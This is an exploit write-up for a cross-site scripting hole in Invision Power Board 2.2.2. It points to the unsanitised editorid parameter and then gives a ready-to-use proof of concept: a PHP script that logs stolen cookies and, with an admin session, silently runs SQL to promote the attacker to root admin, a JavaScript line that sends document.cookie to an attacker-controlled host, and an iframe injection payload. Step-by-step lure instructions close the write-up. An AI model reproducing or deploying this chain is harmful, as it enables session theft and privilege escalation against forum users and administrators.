Invision Power Board Cross Site Scripting Vulnerability

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
#  See:

    var editor_id         = <?php print 
'"'.trim($_REQUEST['editorid']).'";'; ?>
 
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without 
trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root 
admin

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: 
".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0 
src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#  Also create a file in the same directory named "log.txt" and chmod it 
777
#
#  Now, create a file called script.js on your webserver, put this code in 
it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
#  And, last but not least, create a file that combines those two ;)
#  Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<iframe border=0 
src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Now, post a message on the forum or send a pm to your target with the 
link to the html page.
#  If a normal user views the page, his cookies
#  will be logged, funny. If an admin visits the page and he has an 
admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).